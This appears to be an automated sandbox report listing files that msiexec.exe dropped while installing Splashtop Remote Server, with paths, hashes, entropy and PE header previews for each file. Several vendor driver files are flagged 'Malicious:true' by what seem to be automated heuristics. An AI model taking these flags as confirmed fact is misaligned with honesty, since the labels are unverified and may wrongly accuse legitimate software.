                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....P.Y...........!.....6..................P...............................0.......Z....@.....................................<........................#..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxywddm.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):115136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.395746141588922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:7d+TsLFRVW08y8ka9xh+V3Un7C8PcYNzAR2k:R+wpCh+Vk7LPcWE0k
                                                                                                                                                                                                                                                                                                                                  MD5:91F0E25E7EDF20F4B262A5419CDF73F2
                                                                                                                                                                                                                                                                                                                                  SHA1:3D09164F4298A0EB1EEC978C1D3CA8259AABA326
                                                                                                                                                                                                                                                                                                                                  SHA-256:D9EF2E7A55DE74FFB18CFD2CD875089B81416B636CB6BD73A6DAFDDD5E3E0BF4
                                                                                                                                                                                                                                                                                                                                  SHA-512:2F4076F08EA9F3960A374F872AA547581811B4D1D225978F4FDFB5E42EF6FE79C491A53B33F7DD1E2B71BE6A281EFE29E7BF8ECFFD660D101F456AC4D456FA75
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C^./.?.|.?.|.?.|jb.}.?.|.?.|d?.|jb.}.?.|jb.}.?.|jb.}.?.|.a.}x?.|.a7|.?.|.a.}.?.|Rich.?.|........PE..d....P.Y.........."......N...N......,..........@................................................................................................(............@...........#......L.......8............................................................................text............................... ..h.rdata..d,..........................@..H.data........0......................@....pdata.......@......."..............@..H.gfids.......P.......2..............@..HPAGE.....R...`...T...4.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc..L...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\my_setup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.407648101166343
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:FkVsC2/s2Abnkr+YcSIVO67k5hVEi4ZKoqZsHLErHPnhk:nP0bE+YHIO67kLcn2/hk
                                                                                                                                                                                                                                                                                                                                  MD5:1FB5DE2628ECB1E835B18FDA9EB0CF29
                                                                                                                                                                                                                                                                                                                                  SHA1:560AD3A8FC97187403754FBE2F3DBA056948B6CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:D1ADED22243AAF4B8727B064073B9CB1C33214DA01E76D08E69996E52E774538
                                                                                                                                                                                                                                                                                                                                  SHA-512:E51BD203950E4D5DF2E26E59D90D8DC7E0B2D767C58688D2CBAB0BFD5ED5C884A72E029A737FCF1E04C908D7404645EDEC609A2E7C42E6BDCA1CDD04AB2169CC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..D.|...|...|..v...~|...|..B|..v...r|..v...t|..v...~|..v...~|..v...~|..Rich.|..........PE..d....P.Y.........." .....6...........1....................................................@.........................................pC.......;...............`.......@...#...p..0... ................................................................................text....4.......6.................. ..`.data...@....P.......:..............@....pdata.......`.......<..............@..@.reloc..Z....p.......>..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_iddcx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.573292469340805
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:jbWmecDs6zvVt94VbJqvhkqskgSjyzFigs2Ktmen4hI:jbM6JX0Jq5kNGcsntmer
                                                                                                                                                                                                                                                                                                                                  MD5:33C12C6F8271195C79B755388642FF77
                                                                                                                                                                                                                                                                                                                                  SHA1:ABF3438FC7FF738BF3D030AE68BB16CBF4848462
                                                                                                                                                                                                                                                                                                                                  SHA-256:086E922B53D801F63043D067A185893E5CD6341394B0E8C253D08D85D14B60A5
                                                                                                                                                                                                                                                                                                                                  SHA-512:13B8EEDF0E98476E40DAB4059C6E91C591FA1DD21844151916CA70E1440FE22FA211D53E766D37DF0E494739C7881AF340731FCCAFAE73CAF81733D9FC1E1E88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$................................................A................x)'....x) ..........[......[......[......^.-....[......Rich...................PE..L....P.Y...........!.....N...2.......E.......`......................................%.....@..........................p..T....q.......................~...#..........0l..8...........................hl...............`..H............................text...;L.......N.................. ..`.rdata..\....`.......R..............@..@.data................n..............@....gfids...............p..............@..@.rsrc................r..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.516896540085767
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/i+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIo8:K+xNDVCYFB/vqIo8
                                                                                                                                                                                                                                                                                                                                  MD5:F67D8A541D407C6886D6358248014B8E
                                                                                                                                                                                                                                                                                                                                  SHA1:9E17CD44ABBE3B30E0B52FBC5A6012BEA2CFCE61
                                                                                                                                                                                                                                                                                                                                  SHA-256:919ACBEDDCBFE27D12EE44ECD38044D880A68622D7BC412FF81B089746C79E5F
                                                                                                                                                                                                                                                                                                                                  SHA-512:674D9427B3F62382AD56EA647FD131CFF2E78CF31D5E7F608191390E752C382946C4CADB26B556F670C8C4A1C9245D1857841527C755BC505295224C4256C495
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....P.Y...........!.....6..................P...............................0............@.....................................<........................#..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.517207826538128
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Bi+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIod:s+xNDVCYFB/vqIod
                                                                                                                                                                                                                                                                                                                                  MD5:66541304390931345318FA3802797820
                                                                                                                                                                                                                                                                                                                                  SHA1:11B3116900D0BB1D9F49E39788C4C21A6B82954E
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9CB315AD55CAD2147AAEBDCCC02055868DAF3EFD9F25384E50E80CE81EC018E
                                                                                                                                                                                                                                                                                                                                  SHA-512:852EF5A95F5827E8BCBC437371FFE6B3959AD41F319721E14804BD143E1597753F0DE4DA86864098F11B4F0698831529054D07B3650AECE83DAB2E5A7C51AE2A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....P.Y...........!.....6..................P...............................0......."....@.....................................<........................#..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxywddm.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):88000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656236620722421
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1++m+LZZ3SFkKjrZFWUwTK4gCQ7fBr8UQ6SIDXvjeIg6NhUA0d:1LL73SFHjOUaK4gNoUQ6SE7hXNhUA0d
                                                                                                                                                                                                                                                                                                                                  MD5:B36B39A2AA5C15D0167A7D8454AE71A6
                                                                                                                                                                                                                                                                                                                                  SHA1:2CD2E7DAF1762A44F4FD4FC84FFC60D84A2AEFA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:01871A132386F81DFD4894E9DAEB9433C4BE2A99EBE8FEC954E5182A43E96AF0
                                                                                                                                                                                                                                                                                                                                  SHA-512:4BC14EDF6C0A9695764DEAD9C90F502DCDB7F420BD54794539183BFFECD054218290C23C57155EF982F1DAA4B479DAF80B63C7CA643F73AF2A66AC01E96926E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................................8......=.=....8......Rich....................PE..L....P.Y.....................*.......@............@..........................p.............................................4A..<....P...............4...#...`..t... ...8...........................X...@............................................text...,........................... ..h.rdata..D...........................@..H.data...............................@...PAGE.....?.......@.................. ..`INIT....r....@...................... ..b.rsrc........P.......$..............@..B.reloc..t....`.......(..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\my_setup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22976
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.652405722283548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:pMuUkfWPmqKebW1j2zAAHOOntqVOviZKoqZsHLEF0PnhjIS:VHqKyWMvUOyncIhjIS
                                                                                                                                                                                                                                                                                                                                  MD5:893828FDA5B4026B36C238CBED43BCC2
                                                                                                                                                                                                                                                                                                                                  SHA1:B485E255B2F6F1C294BC127AA2BE14A39C346F56
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEA46DCCAF211E71DE3895C08E7C9A828C53232EDDBC90C0A6E3552826A8DDFA
                                                                                                                                                                                                                                                                                                                                  SHA-512:951598591F2A395F8C5F993A5BD850CED11F43433DF00CF5B12CBAB360949E305A52CDF55A675C8FE59F275432C92D479444C91F71AB39AB342200560972A6A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=5.:yT.iyT.iyT.ip,QixT.iyT.iET.ip,WitT.ip,VixT.ip,GitT.ip,UixT.iRichyT.i........................PE..L....P.Y...........!.....,..........-/.......@...............................`.......(....@......................... :......|3.......................6...#...P..4...................................(...@............................................text....*.......,.................. ..`.data........@.......0..............@....reloc.......P.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.279860186543382
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+2A2RJoIo6vyowJL/aoxhHoe068jSJUbueqw4G:JRaD8YJLFHJ06dUb+w1
                                                                                                                                                                                                                                                                                                                                  MD5:092FF1A83123D816B748F0D382792543
                                                                                                                                                                                                                                                                                                                                  SHA1:C1D1E85955113B8AAB604107738E6B532FE5C706
                                                                                                                                                                                                                                                                                                                                  SHA-256:E81535236E4BDC5534677D05AB3DB67F03283E756233924945CC7D93D394DB5A
                                                                                                                                                                                                                                                                                                                                  SHA-512:7A24AF6CEF474663E615F9BCD5780D97D4249AE8D767EB60927A2BF7B7E66B1777486886C7A053C30301F98E22CCD5AAB7877BC47FA5000C34A707806B198864
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0. ...*.H........ .0. ....1.0...+......0..a..+.....7.....R0..N0...+.....7...........cA.....G....081005153941Z0...+.....7.....0...0....R1.7.C.9.C.C.1.B.2.1.1.8.1.0.C.9.D.B.5.7.8.5.3.B.0.8.5.1.7.E.8.E.F.A.A.7.6.D.C.E...1..702..+.....7...1$0"...F.i.l.e........m.v.2...d.l.l...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...0...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+............!....W.;.Q~...m.0....R9.6.B.8.E.2.E.D.6.3.F.5.4.B.E.B.4.E.0.8.7.7.1.2.A.D.A.7.5.2.0.C.2.3.7.9.C.5.C.4...1../02..+.....7...1$0"...F.i.l.e........m.v.2...i.n.f...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...0...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+............c.K.N.w...R.#y..0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RA.9.4.9.3.C.B.6.B.6.B.E.D.A.B.7.E.8.3.E.2.B.8.D.E.C.1.9.5.6.9.2.7.A

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.292871779652706
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U2dFSGikkp4cE8WWk2lg0ZeE313MrnCbuSLwJiU:deeJlGMroJIiU
                                                                                                                                                                                                                                                                                                                                  MD5:867F3CA0E3A4B57F5BA7519B645AED66
                                                                                                                                                                                                                                                                                                                                  SHA1:837676FE5C7B62AFAA4D49E6AC51EDF948AD1757
                                                                                                                                                                                                                                                                                                                                  SHA-256:1A392E8731E4F01476C54FB4FD408F590D8530C34E3835081886A0056A91E502
                                                                                                                                                                                                                                                                                                                                  SHA-512:27E21584DC54D1996FDFEE2002027061A160E89BD3B7249C017D91900381102674D65282E9B623F002F392BBF8649F0092DE9CB46C70B739A42EE62A3753C8FF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9...W...W...W..=,...W...V...W..=*...W..=:...W..=&...W..=+...W..=/...W.Rich..W.........PE..d......H.........." .....2...........7............................................... .......................................................p..(............`..,....J..........<....@...............................................@...............................text....-.......................... ..h.rdata.......@.......2..............@..H.data........P.......8..............@....pdata..,....`.......>..............@..HINIT.........p.......@.............. ....rsrc................D..............@..B.reloc...............H..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3700497661675906
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs00c/9XSvFhb54y83WhJhdYpBBh22wlFTP/7bp:MJfJ00Si4yMyA7DwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:1B4F828FC21AA28C3CE863A31C1F9D48
                                                                                                                                                                                                                                                                                                                                  SHA1:96B8E2ED63F54BEB4E087712ADA7520C2379C5C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7F85212D7708402910830576B0BD84873C24A1339CFD3EBBE5A2939127438D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CF0E701ADCBBE05652F623A34849910C657FA9536513835D18FD184FAAD47B62C28437237A78494B8E31F5E27C0BDDCD9D4CB5C5B4BEDC56EF0842553AB3064
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
